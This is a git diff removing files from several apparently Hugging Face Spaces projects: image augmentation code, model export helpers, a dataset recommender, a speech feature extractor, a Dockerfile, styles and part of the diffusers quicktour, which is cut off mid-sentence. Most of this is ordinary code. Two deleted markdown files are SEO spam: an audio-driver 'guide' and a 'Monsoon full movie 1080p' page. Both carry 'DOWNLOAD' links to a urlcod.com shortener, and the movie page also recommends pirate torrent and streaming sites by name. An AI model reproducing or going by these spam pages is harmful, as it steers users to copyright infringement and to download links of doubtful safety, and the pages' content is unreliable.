R = np.eye(3) - a = random.uniform(-degrees, degrees) - # a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations - s = random.uniform(1 - scale, 1 + scale) - # s = 2 ** random.uniform(-scale, scale) - R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s) - - # Shear - S = np.eye(3) - S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg) - S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg) - - # Translation - T = np.eye(3) - T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels) - T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels) - - # Combined rotation matrix - M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT - if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed - if perspective: - im = cv2.warpPerspective(im, M, dsize=(width, height), borderValue=(114, 114, 114)) - else: # affine - im = cv2.warpAffine(im, M[:2], dsize=(width, height), borderValue=(114, 114, 114)) - - # Visualize - # import matplotlib.pyplot as plt - # ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel() - # ax[0].imshow(im[:, :, ::-1]) # base - # ax[1].imshow(im2[:, :, ::-1]) # warped - - # Transform label coordinates - n = len(targets) - if n: - use_segments = any(x.any() for x in segments) - new = np.zeros((n, 4)) - if use_segments: # warp segments - segments = resample_segments(segments) # upsample - for i, segment in enumerate(segments): - xy = np.ones((len(segment), 3)) - xy[:, :2] = segment - xy = xy @ M.T # transform - xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine - - # clip - new[i] = segment2box(xy, width, height) - - else: # warp boxes - xy = np.ones((n * 4, 3)) - xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1 - xy = xy @ M.T # transform - xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine - - # create new boxes - x = xy[:, [0, 2, 4, 6]] - y = xy[:, [1, 3, 5, 7]] - new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T - - # clip - new[:, [0, 2]] = new[:, [0, 2]].clip(0, width) - new[:, [1, 3]] = new[:, [1, 3]].clip(0, height) - - # filter candidates - i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10) - targets = targets[i] - targets[:, 1:5] = new[i] - - return im, targets - - -def copy_paste(im, labels, segments, p=0.5): - # Implement Copy-Paste augmentation https://arxiv.org/abs/2012.07177, labels as nx5 np.array(cls, xyxy) - n = len(segments) - if p and n: - h, w, c = im.shape # height, width, channels - im_new = np.zeros(im.shape, np.uint8) - for j in random.sample(range(n), k=round(p * n)): - l, s = labels[j], segments[j] - box = w - l[3], l[2], w - l[1], l[4] - ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area - if (ioa < 0.30).all(): # allow 30% obscuration of existing labels - labels = np.concatenate((labels, [[l[0], *box]]), 0) - segments.append(np.concatenate((w - s[:, 0:1], s[:, 1:2]), 1)) - cv2.drawContours(im_new, [segments[j].astype(np.int32)], -1, (255, 255, 255), cv2.FILLED) - - result = cv2.bitwise_and(src1=im, src2=im_new) - result = cv2.flip(result, 1) # augment segments (flip left-right) - i = result > 0 # pixels to replace - # i[:, :] = result.max(2).reshape(h, w, 1) # act over ch - im[i] = result[i] # cv2.imwrite('debug.jpg', im) # debug - - return im, labels, segments - - -def cutout(im, labels, p=0.5): - # Applies image cutout augmentation https://arxiv.org/abs/1708.04552 - if random.random() < p: - h, w = im.shape[:2] - scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction - for s in scales: - mask_h = random.randint(1, int(h * s)) # create random masks - mask_w = random.randint(1, int(w * s)) - - # box - xmin = max(0, random.randint(0, w) - mask_w // 2) - ymin = max(0, random.randint(0, h) - mask_h // 2) - xmax = min(w, xmin + mask_w) - ymax = min(h, ymin + mask_h) - - # apply random color mask - im[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)] - - # return unobscured labels - if len(labels) and s > 0.03: - box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32) - ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area - labels = labels[ioa < 0.60] # remove >60% obscured labels - - return labels - - -def mixup(im, labels, im2, labels2): - # Applies MixUp augmentation https://arxiv.org/pdf/1710.09412.pdf - r = np.random.beta(32.0, 32.0) # mixup ratio, alpha=beta=32.0 - im = (im * r + im2 * (1 - r)).astype(np.uint8) - labels = np.concatenate((labels, labels2), 0) - return im, labels - - -def box_candidates(box1, box2, wh_thr=2, ar_thr=100, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n) - # Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio - w1, h1 = box1[2] - box1[0], box1[3] - box1[1] - w2, h2 = box2[2] - box2[0], box2[3] - box2[1] - ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio - return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates diff --git a/spaces/naver/PUMP/test_multiscale_recursive.py b/spaces/naver/PUMP/test_multiscale_recursive.py deleted file mode 100644 index f7c073f12de5abc66794e099c79eefe8e0d0a388..0000000000000000000000000000000000000000 --- a/spaces/naver/PUMP/test_multiscale_recursive.py +++ /dev/null @@ -1,24 +0,0 @@ -# Copyright 2022-present NAVER Corp. -# CC BY-NC-SA 4.0 -# Available only for non-commercial use - -import test_singlescale as ss -import test_singlescale_recursive as ssr -import test_multiscale as ms - -def arg_parser(): - parser = ssr.arg_parser(ms.arg_parser()) - return parser - -class Main (ms.Main): - @staticmethod - def build_matcher(args, device): - # get a single-scale recursive matcher - matcher = ssr.Main.build_matcher(args, device) - type(matcher).demultiplex_img_trf = ms.demultiplex_img_trf # update transformer - - options = Main.get_options(args) - return Main.tune_matcher(args, ms.MultiScalePUMP(matcher, **options), device).to(device) - -if __name__ == '__main__': - Main().run_from_args(arg_parser().parse_args()) diff --git a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Intel 82801hb Ich8 High Definition Audio Driver.md b/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Intel 82801hb Ich8 High Definition Audio Driver.md deleted file mode 100644 index 591f36fe6a29532e3729bee22908231061abe08e..0000000000000000000000000000000000000000 --- a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Intel 82801hb Ich8 High Definition Audio Driver.md +++ /dev/null @@ -1,56 +0,0 @@ -
    -

    How to Download and Install Intel 82801HB ICH8 High Definition Audio Driver

    - -

    If you have a computer that uses the Intel I/O Controller Hub 8 (Intel ICH8) family of chipsets, you may need to update your audio driver to ensure optimal performance and compatibility. The Intel 82801HB ICH8 is one of the components of the Intel ICH8 family that supports high definition audio. In this article, we will show you how to download and install the latest Intel 82801HB ICH8 high definition audio driver for Windows 10 and Windows 11.

    -

    intel 82801hb ich8 high definition audio driver


    DOWNLOAD ►►►►► https://urlcod.com/2uIaNb



    - -

    What is Intel 82801HB ICH8 High Definition Audio Driver?

    - -

    The Intel 82801HB ICH8 high definition audio driver is a software component that enables the communication between the operating system and the audio hardware of your computer. It allows you to play sound through your speakers or headphones, as well as record sound through your microphone or other input devices. The driver also supports Intel Smart Sound Technology (Intel SST), which enhances the sound quality and reduces power consumption.

    - -

    Why Do You Need to Update Intel 82801HB ICH8 High Definition Audio Driver?

    - -

    Updating your audio driver can improve the stability and performance of your sound system, as well as fix any issues or bugs that may occur. Some of the benefits of updating your audio driver include:

    - -
      -
    • Enhanced sound quality and clarity
    • -
    • Better compatibility with new applications and devices
    • -
    • Improved security and reliability
    • -
    • Resolved audio problems such as no sound, distorted sound, or crackling noise
    • -
    - -

    How to Download and Install Intel 82801HB ICH8 High Definition Audio Driver?

    - -

    To download and install the latest Intel 82801HB ICH8 high definition audio driver for Windows 10 and Windows 11, you can follow these steps:

    - -
      -
    1. Go to the Realtek* High Definition Audio Driver for Windows® 10 64-bit ... - Intel page on the Intel website.
    2. -
    3. Click on the Download button next to the file name that matches your operating system version and architecture (32-bit or 64-bit).
    4. -
    5. Save the file to a convenient location on your computer.
    6. -
    7. Double-click on the downloaded file to launch the installer.
    8. -
    9. Follow the on-screen instructions to complete the installation process.
    10. -
    11. Restart your computer for the changes to take effect.
    12. -
    - -

    Congratulations! You have successfully downloaded and installed the latest Intel 82801HB ICH8 high definition audio driver for your computer. You can now enjoy high-quality sound on your speakers or headphones.

    - -

    How to Troubleshoot Intel 82801HB ICH8 High Definition Audio Driver Issues?

    - -

    Even after updating your audio driver, you may still encounter some problems with your sound system. Here are some common issues and how to troubleshoot them:

    -

    - -
      -
    • No sound: Check if your speakers or headphones are properly connected and powered on. Adjust the volume level and make sure it is not muted. Right-click on the speaker icon on the taskbar and select Troubleshoot sound problems. Follow the instructions to diagnose and fix the issue.
    • -
    • Distorted sound or crackling noise: Check if there is any interference or damage to your audio cable or jack. Try using a different audio device or port. Update your BIOS and chipset drivers. Disable any audio enhancements or effects that may be enabled.
    • -
    • Low sound quality or compatibility issues: Check if you have the latest version of the application or device that you are using. Adjust the audio settings and preferences according to your needs. Enable or disable Intel SST depending on the situation.
    • -
    - -

    If none of these solutions work, you can contact Intel customer support or visit their online forums for more assistance.

    - -

    Conclusion

    - -

    The Intel 82801HB ICH8 high definition audio driver is a vital component of your computer's sound system. It allows you to enjoy high-quality sound on your speakers or headphones, as well as record sound through your microphone or other input devices. By updating your audio driver regularly, you can ensure optimal performance and compatibility of your sound system. You can also troubleshoot any issues that may arise by following the steps above.

    - -

    We hope this article has helped you learn how to download and install the latest Intel 82801HB ICH8 high definition audio driver for Windows 10 and Windows 11. If you have any questions or feedback, please feel free to leave a comment below.

    cec2833e83
    -
    -
    \ No newline at end of file diff --git a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Monsoon Full Movie 1080p Download EXCLUSIVE.md b/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Monsoon Full Movie 1080p Download EXCLUSIVE.md deleted file mode 100644 index 54b5b1c21234dc554507406275969ad6619d72e0..0000000000000000000000000000000000000000 --- a/spaces/netiMophi/DreamlikeArt-Diffusion-1.0/Monsoon Full Movie 1080p Download EXCLUSIVE.md +++ /dev/null @@ -1,25 +0,0 @@ -
    -

    How to Watch Monsoon Full Movie 1080p Online for Free

    -

    Monsoon is a 2019 drama film directed by Hong Khaou and starring Henry Golding, Parker Sawyers, and David Tran. The film follows Kit, a British Vietnamese man who returns to Saigon for the first time in over 30 years, after fleeing during the Vietnam-American War. The film explores themes of identity, culture, and belonging as Kit reconnects with his roots and finds romance along the way.

    -

    Monsoon Full Movie 1080p Download


    Download –––––>>> https://urlcod.com/2uIb43



    -

    If you are interested in watching Monsoon full movie 1080p online for free, you have come to the right place. In this article, we will show you how to download Monsoon full movie 1080p from various sources and watch it on your preferred device. We will also provide some information about the film's plot, cast, and reviews.

    -

    Download Monsoon Full Movie 1080p from Torrent Sites

    -

    One of the easiest ways to watch Monsoon full movie 1080p online for free is to download it from torrent sites. Torrent sites are platforms that allow users to share files such as movies, music, games, etc. using peer-to-peer technology. You can find many torrent sites that offer Monsoon full movie 1080p in different formats and qualities.

    -

    However, before you download Monsoon full movie 1080p from torrent sites, you should be aware of the risks involved. Torrenting is illegal in many countries and can expose you to malware, viruses, and legal issues. You should always use a VPN (virtual private network) to protect your privacy and security when downloading torrents. You should also check the comments and ratings of the torrent file before downloading it to avoid fake or corrupted files.

    -

    Some of the popular torrent sites that offer Monsoon full movie 1080p are:

    -

    -
      -
    • YTS.mx: This site is known for its high-quality movies in small file sizes. You can download Monsoon full movie 1080p BluRay or WEB from this site with English subtitles.
    • -
    • Mkvking.com: This site provides various formats and qualities of movies, including BluRay, WEB-DL, HDRip, etc. You can download Monsoon full movie 1080p BluRay or WEB-DL from this site with English or Indonesian subtitles.
    • -
    • The Pirate Bay: This site is one of the oldest and most popular torrent sites in the world. You can find many torrents for Monsoon full movie 1080p on this site, but you may need to use a proxy or mirror site to access it.
    • -
    -

    Watch Monsoon Full Movie 1080p on Streaming Sites

    -

    Another way to watch Monsoon full movie 1080p online for free is to stream it on streaming sites. Streaming sites are platforms that allow users to watch movies, TV shows, documentaries, etc. online without downloading them. You can find many streaming sites that offer Monsoon full movie 1080p in different languages and regions.

    -

    However, before you watch Monsoon full movie 1080p on streaming sites, you should be aware of the drawbacks involved. Streaming sites may not have the best quality or sound of the movie. They may also have annoying ads or pop-ups that interrupt your viewing experience. They may also require you to sign up or register before watching the movie. Moreover, streaming sites may not be legal or safe in some countries and can expose you to malware, viruses, and legal issues. You should always use a VPN (virtual private network) to protect your privacy and security when streaming movies online.

    -

    Some of the popular streaming sites that offer Monsoon full movie 1080p are:

    -
      -
    • Putlocker: This site is one of the most popular streaming sites in the world. You can watch Monsoon full movie 1080p on this site without signing up or registering.
    • -
    • Fmovies: This site provides a large collection of movies and TV shows in various genres and languages. You can watch Monsoon full movie 1080p on this site with English subtitles.
    • -
    • Gomovies: This site offers fast and reliable streaming of movies and TV shows in HD quality. You can watch Monsoon full movie 1080p

      7b8c122e87
      -
      -
      \ No newline at end of file diff --git a/spaces/ngoctuanai/chatgptfree/Dockerfile b/spaces/ngoctuanai/chatgptfree/Dockerfile deleted file mode 100644 index 82e784ecdc596f0de49001c17f0376a3c10e97f3..0000000000000000000000000000000000000000 --- a/spaces/ngoctuanai/chatgptfree/Dockerfile +++ /dev/null @@ -1,7 +0,0 @@ -FROM node:18 -RUN git clone https://github.com/chokiproai/ChatGPT-Plugins.git -WORKDIR "ChatGPT-Plugins" -RUN npm i -RUN npm run build -EXPOSE 3000 -CMD ["npm", "run", "start"] diff --git a/spaces/nikitaPDL2023/assignment4/detectron2/detectron2/export/torchscript.py b/spaces/nikitaPDL2023/assignment4/detectron2/detectron2/export/torchscript.py deleted file mode 100644 index 24fe59bda44225324928542df3f2ef1745375dfd..0000000000000000000000000000000000000000 --- a/spaces/nikitaPDL2023/assignment4/detectron2/detectron2/export/torchscript.py +++ /dev/null @@ -1,132 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. - -import os -import torch - -from detectron2.utils.file_io import PathManager - -from .torchscript_patch import freeze_training_mode, patch_instances - -__all__ = ["scripting_with_instances", "dump_torchscript_IR"] - - -def scripting_with_instances(model, fields): - """ - Run :func:`torch.jit.script` on a model that uses the :class:`Instances` class. Since - attributes of :class:`Instances` are "dynamically" added in eager mode,it is difficult - for scripting to support it out of the box. This function is made to support scripting - a model that uses :class:`Instances`. It does the following: - - 1. Create a scriptable ``new_Instances`` class which behaves similarly to ``Instances``, - but with all attributes been "static". - The attributes need to be statically declared in the ``fields`` argument. - 2. Register ``new_Instances``, and force scripting compiler to - use it when trying to compile ``Instances``. - - After this function, the process will be reverted. User should be able to script another model - using different fields. - - Example: - Assume that ``Instances`` in the model consist of two attributes named - ``proposal_boxes`` and ``objectness_logits`` with type :class:`Boxes` and - :class:`Tensor` respectively during inference. You can call this function like: - :: - fields = {"proposal_boxes": Boxes, "objectness_logits": torch.Tensor} - torchscipt_model = scripting_with_instances(model, fields) - - Note: - It only support models in evaluation mode. - - Args: - model (nn.Module): The input model to be exported by scripting. - fields (Dict[str, type]): Attribute names and corresponding type that - ``Instances`` will use in the model. Note that all attributes used in ``Instances`` - need to be added, regardless of whether they are inputs/outputs of the model. - Data type not defined in detectron2 is not supported for now. - - Returns: - torch.jit.ScriptModule: the model in torchscript format - """ - assert ( - not model.training - ), "Currently we only support exporting models in evaluation mode to torchscript" - - with freeze_training_mode(model), patch_instances(fields): - scripted_model = torch.jit.script(model) - return scripted_model - - -# alias for old name -export_torchscript_with_instances = scripting_with_instances - - -def dump_torchscript_IR(model, dir): - """ - Dump IR of a TracedModule/ScriptModule/Function in various format (code, graph, - inlined graph). Useful for debugging. - - Args: - model (TracedModule/ScriptModule/ScriptFUnction): traced or scripted module - dir (str): output directory to dump files. - """ - dir = os.path.expanduser(dir) - PathManager.mkdirs(dir) - - def _get_script_mod(mod): - if isinstance(mod, torch.jit.TracedModule): - return mod._actual_script_module - return mod - - # Dump pretty-printed code: https://pytorch.org/docs/stable/jit.html#inspecting-code - with PathManager.open(os.path.join(dir, "model_ts_code.txt"), "w") as f: - - def get_code(mod): - # Try a few ways to get code using private attributes. - try: - # This contains more information than just `mod.code` - return _get_script_mod(mod)._c.code - except AttributeError: - pass - try: - return mod.code - except AttributeError: - return None - - def dump_code(prefix, mod): - code = get_code(mod) - name = prefix or "root model" - if code is None: - f.write(f"Could not found code for {name} (type={mod.original_name})\n") - f.write("\n") - else: - f.write(f"\nCode for {name}, type={mod.original_name}:\n") - f.write(code) - f.write("\n") - f.write("-" * 80) - - for name, m in mod.named_children(): - dump_code(prefix + "." + name, m) - - if isinstance(model, torch.jit.ScriptFunction): - f.write(get_code(model)) - else: - dump_code("", model) - - def _get_graph(model): - try: - # Recursively dump IR of all modules - return _get_script_mod(model)._c.dump_to_str(True, False, False) - except AttributeError: - return model.graph.str() - - with PathManager.open(os.path.join(dir, "model_ts_IR.txt"), "w") as f: - f.write(_get_graph(model)) - - # Dump IR of the entire graph (all submodules inlined) - with PathManager.open(os.path.join(dir, "model_ts_IR_inlined.txt"), "w") as f: - f.write(str(model.inlined_graph)) - - if not isinstance(model, torch.jit.ScriptFunction): - # Dump the model structure in pytorch style - with PathManager.open(os.path.join(dir, "model.txt"), "w") as f: - f.write(str(model)) diff --git a/spaces/nkasmanoff/SearchingFace/dataset_recommender.py b/spaces/nkasmanoff/SearchingFace/dataset_recommender.py deleted file mode 100644 index f7c367fb1408f10e5abfc83cdd4ab156a432c129..0000000000000000000000000000000000000000 --- a/spaces/nkasmanoff/SearchingFace/dataset_recommender.py +++ /dev/null @@ -1,48 +0,0 @@ -from langchain.chains import RetrievalQA -from vectorize_dataset import load_descriptions_data, create_db -from helpers import clean_up_tags, get_dataset_metadata, get_dataset_readme -from langchain.embeddings import HuggingFaceEmbeddings -from langchain import HuggingFaceHub -from langchain.chat_models import ChatOpenAI -from langchain.embeddings import OpenAIEmbeddings - - -class DatasetRecommender: - def __init__(self, dataset = 'nkasmanoff/huggingface-datasets' , - llm_backbone = ChatOpenAI(), - embeddings_backbone = HuggingFaceEmbeddings()): - self.dataset = dataset - self.llm_backbone = llm_backbone - self.embeddings_backbone = embeddings_backbone - self.hf_df = load_descriptions_data(dataset=self.dataset) - self.db = create_db(self.hf_df, self.embeddings_backbone) - self.datasets_url_base = "https://huggingface.co/datasets/" - # expose this index in a retriever interface - self.retriever = self.db.as_retriever(search_type="similarity", search_kwargs={"k":2}) - # create a chain to answer questions - self.qa = RetrievalQA.from_chain_type( - llm=self.llm_backbone, chain_type="stuff", retriever=self.retriever, return_source_documents=True) - - def recommend_based_on_text(self, query): - result = self.qa({"query": query}) - response_text = result['result'] - source_documents = result['source_documents'] - linked_datasets = [f"{self.datasets_url_base}{x.metadata['id']}" for x in source_documents] - return {'message': response_text, 'datasets': linked_datasets} - - def get_similar_datasets(self, query_url): - if self.dataset == "nkasmanoff/hf-dataset-cards": - retrieved_metadata = get_dataset_readme(query_url) - if 'README' not in retrieved_metadata: - return {'error': 'no description found for this dataset.'} - - cleaned_description = retrieved_metadata['README'] - else: - retrieved_metadata = get_dataset_metadata(query_url) - if 'description' not in retrieved_metadata: - return {'error': 'no description found for this dataset.'} - cleaned_description = retrieved_metadata['description'] + clean_up_tags(retrieved_metadata['tags']) - - similar_documents = self.db.similarity_search(cleaned_description) - similar_datasets = [f"{self.datasets_url_base}{x.metadata['id']}" for x in similar_documents if x.metadata['id'] not in query_url] - return {'datasets': similar_datasets} \ No newline at end of file diff --git a/spaces/nomic-ai/tweet_eval/README.md b/spaces/nomic-ai/tweet_eval/README.md deleted file mode 100644 index 794135cbdcad3f09bad1be1712afc4ec978160ef..0000000000000000000000000000000000000000 --- a/spaces/nomic-ai/tweet_eval/README.md +++ /dev/null @@ -1,8 +0,0 @@ ---- -title: tweet_eval -emoji: 🗺️ -colorFrom: purple -colorTo: red -sdk: static -pinned: false ---- diff --git a/spaces/nomic-ai/yahma_alpaca-cleaned/style.css b/spaces/nomic-ai/yahma_alpaca-cleaned/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/nomic-ai/yahma_alpaca-cleaned/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/nus-cs5647-team-5/Mandarin_Tone_Evaluation/speech_features/speech_features.py b/spaces/nus-cs5647-team-5/Mandarin_Tone_Evaluation/speech_features/speech_features.py deleted file mode 100644 index 32cb3d64e7f03f4f53ed0326906607ce6674f8e0..0000000000000000000000000000000000000000 --- a/spaces/nus-cs5647-team-5/Mandarin_Tone_Evaluation/speech_features/speech_features.py +++ /dev/null @@ -1,142 +0,0 @@ -import random -import numpy as np -from scipy.fftpack import fft - - -class SpeechFeatureMeta(): - ''' - 语音识别中所有声学特征提取类的基类 - ''' - - def __init__(self, framesamplerate=16000): - self.framesamplerate = framesamplerate - - def run(self, wavsignal, fs=16000): - ''' - run method - ''' - raise NotImplementedError('[5647] `run()` method is not implemented.') - - -class Spectrogram(SpeechFeatureMeta): - ''' - 语音识别内置的语谱图声学特征提取类 - ''' - - def __init__(self, framesamplerate=16000, timewindow=25, timeshift=10): - self.time_window = timewindow - self.window_length = int(framesamplerate / 1000 * self.time_window) # 计算窗长度的公式,目前全部为400固定值 - self.timeshift = timeshift - - ''' - # 保留将来用于不同采样频率 - self.x=np.linspace(0, self.window_length - 1, self.window_length, dtype = np.int64) - self.w = 0.54 - 0.46 * np.cos(2 * np.pi * (self.x) / (self.window_length - 1) ) # 汉明窗 - ''' - - self.x = np.linspace(0, 400 - 1, 400, dtype=np.int64) - self.w = 0.54 - 0.46 * np.cos(2 * np.pi * (self.x) / (400 - 1)) # 汉明窗 - super().__init__(framesamplerate) - - def run(self, wavsignal, fs=16000): - if fs != 16000: - raise ValueError( - '[Error] ASRT currently only supports wav audio files with a sampling rate of 16000 Hz, but this audio is ' + str( - fs) + ' Hz. ') - - # wav波形 加时间窗以及时移10ms - time_window = 25 # 单位ms - window_length = int(fs / 1000 * time_window) # 计算窗长度的公式,目前全部为400固定值 - - wav_arr = np.array(wavsignal) - # wav_length = len(wavsignal[0]) - # wav_length = wav_arr.shape[1] - - range0_end = int(len(wavsignal[0]) / fs * 1000 - time_window) // 10 + 1 # 计算循环终止的位置,也就是最终生成的窗数 - data_input = np.zeros((range0_end, window_length // 2), dtype=float) # 用于存放最终的频率特征数据 - data_line = np.zeros((1, window_length), dtype=float) - - for i in range(0, range0_end): - p_start = i * 160 - p_end = p_start + 400 - - data_line = wav_arr[0, p_start:p_end] - data_line = data_line * self.w # 加窗 - data_line = np.abs(fft(data_line)) - - data_input[i] = data_line[0: window_length // 2] # 设置为400除以2的值(即200)是取一半数据,因为是对称的 - - # print(data_input.shape) - data_input = np.log(data_input + 1) - return data_input - - -class SpecAugment(SpeechFeatureMeta): - ''' - 复现谷歌SpecAugment数据增强特征算法,基于Spectrogram语谱图基础特征 - ''' - - def __init__(self, framesamplerate=16000, timewindow=25, timeshift=10): - self.time_window = timewindow - self.window_length = int(framesamplerate / 1000 * self.time_window) # 计算窗长度的公式,目前全部为400固定值 - self.timeshift = timeshift - - ''' - # 保留将来用于不同采样频率 - self.x=np.linspace(0, self.window_length - 1, self.window_length, dtype = np.int64) - self.w = 0.54 - 0.46 * np.cos(2 * np.pi * (self.x) / (self.window_length - 1) ) # 汉明窗 - ''' - - self.x = np.linspace(0, 400 - 1, 400, dtype=np.int64) - self.w = 0.54 - 0.46 * np.cos(2 * np.pi * (self.x) / (400 - 1)) # 汉明窗 - super().__init__(framesamplerate) - - def run(self, wavsignal, fs=16000): - if fs != 16000: - raise ValueError( - '[Error] ASRT currently only supports wav audio files with a sampling rate of 16000 Hz, but this audio is ' + str( - fs) + ' Hz. ') - - # wav波形 加时间窗以及时移10ms - time_window = 25 # 单位ms - window_length = int(fs / 1000 * time_window) # 计算窗长度的公式,目前全部为400固定值 - - wav_arr = np.array(wavsignal) - # wav_length = len(wavsignal[0]) - # wav_length = wav_arr.shape[1] - - range0_end = int(len(wavsignal[0]) / fs * 1000 - time_window) // 10 + 1 # 计算循环终止的位置,也就是最终生成的窗数 - data_input = np.zeros((range0_end, window_length // 2), dtype=float) # 用于存放最终的频率特征数据 - data_line = np.zeros((1, window_length), dtype=float) - - for i in range(0, range0_end): - p_start = i * 160 - p_end = p_start + 400 - - data_line = wav_arr[0, p_start:p_end] - data_line = data_line * self.w # 加窗 - data_line = np.abs(fft(data_line)) - - data_input[i] = data_line[0: window_length // 2] # 设置为400除以2的值(即200)是取一半数据,因为是对称的 - - # print(data_input.shape) - data_input = np.log(data_input + 1) - - # 开始对得到的特征应用SpecAugment - mode = random.randint(1, 100) - h_start = random.randint(1, data_input.shape[0]) - h_width = random.randint(1, 100) - - v_start = random.randint(1, data_input.shape[1]) - v_width = random.randint(1, 100) - - if mode <= 60: # 正常特征 60% - pass - elif 60 < mode <= 75: # 横向遮盖 15% - data_input[h_start:h_start + h_width, :] = 0 - elif 75 < mode <= 90: # 纵向遮盖 15% - data_input[:, v_start:v_start + v_width] = 0 - else: # 两种遮盖叠加 10% - data_input[h_start:h_start + h_width, :v_start:v_start + v_width] = 0 - - return data_input diff --git a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/docs/source/en/quicktour.md b/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/docs/source/en/quicktour.md deleted file mode 100644 index 3cf6851e46837f29952f9e9ac70674efb7d70b56..0000000000000000000000000000000000000000 --- a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/docs/source/en/quicktour.md +++ /dev/null @@ -1,314 +0,0 @@ - - -[[open-in-colab]] - -# Quicktour - -Diffusion models are trained to denoise random Gaussian noise step-by-step to generate a sample of interest, such as an image or audio. This has sparked a tremendous amount of interest in generative AI, and you have probably seen examples of diffusion generated images on the internet. 🧨 Diffusers is a library aimed at making diffusion models widely accessible to everyone. - -Whether you're a developer or an everyday user, this quicktour will introduce you to 🧨 Diffusers and help you get up and generating quickly! There are three main components of the library to know about: - -* The [`DiffusionPipeline`] is a high-level end-to-end class designed to rapidly generate samples from pretrained diffusion models for inference. -* Popular pretrained [model](./api/models) architectures and modules that can be used as building blocks for creating diffusion systems. -* Many different [schedulers](./api/schedulers/overview) - algorithms that control how noise is added for training, and how to generate denoised images during inference. - -The quicktour will show you how to use the [`DiffusionPipeline`] for inference, and then walk you through how to combine a model and scheduler to replicate what's happening inside the [`DiffusionPipeline`]. - - - -The quicktour is a simplified version of the introductory 🧨 Diffusers [notebook](https://colab.research.google.com/github/huggingface/notebooks/blob/main/diffusers/diffusers_intro.ipynb) to help you get started quickly. If you want to learn more about 🧨 Diffusers goal, design philosophy, and additional details about it's core API, check out the notebook! - - - -Before you begin, make sure you have all the necessary libraries installed: - -```py -# uncomment to install the necessary libraries in Colab -#!pip install --upgrade diffusers accelerate transformers -``` - -- [🤗 Accelerate](https://huggingface.co/docs/accelerate/index) speeds up model loading for inference and training. -- [🤗 Transformers](https://huggingface.co/docs/transformers/index) is required to run the most popular diffusion models, such as [Stable Diffusion](https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/overview). - -## DiffusionPipeline - -The [`DiffusionPipeline`] is the easiest way to use a pretrained diffusion system for inference. It is an end-to-end system containing the model and the scheduler. You can use the [`DiffusionPipeline`] out-of-the-box for many tasks. Take a look at the table below for some supported tasks, and for a complete list of supported tasks, check out the [🧨 Diffusers Summary](./api/pipelines/overview#diffusers-summary) table. - -| **Task** | **Description** | **Pipeline** -|------------------------------|--------------------------------------------------------------------------------------------------------------|-----------------| -| Unconditional Image Generation | generate an image from Gaussian noise | [unconditional_image_generation](./using-diffusers/unconditional_image_generation) | -| Text-Guided Image Generation | generate an image given a text prompt | [conditional_image_generation](./using-diffusers/conditional_image_generation) | -| Text-Guided Image-to-Image Translation | adapt an image guided by a text prompt | [img2img](./using-diffusers/img2img) | -| Text-Guided Image-Inpainting | fill the masked part of an image given the image, the mask and a text prompt | [inpaint](./using-diffusers/inpaint) | -| Text-Guided Depth-to-Image Translation | adapt parts of an image guided by a text prompt while preserving structure via depth estimation | [depth2img](./using-diffusers/depth2img) | - -Start by creating an instance of a [`DiffusionPipeline`] and specify which pipeline checkpoint you would like to download. -You can use the [`DiffusionPipeline`] for any [checkpoint](https://huggingface.co/models?library=diffusers&sort=downloads) stored on the Hugging Face Hub. -In this quicktour, you'll load the [`stable-diffusion-v1-5`](https://huggingface.co/runwayml/stable-diffusion-v1-5) checkpoint for text-to-image generation. - - - -For [Stable Diffusion](https://huggingface.co/CompVis/stable-diffusion) models, please carefully read the [license](https://huggingface.co/spaces/CompVis/stable-diffusion-license) first before running the model. 🧨 Diffusers implements a [`safety_checker`](https://github.com/huggingface/diffusers/blob/main/src/diffusers/pipelines/stable_diffusion/safety_checker.py) to prevent offensive or harmful content, but the model's improved image generation capabilities can still produce potentially harmful content. - - - -Load the model with the 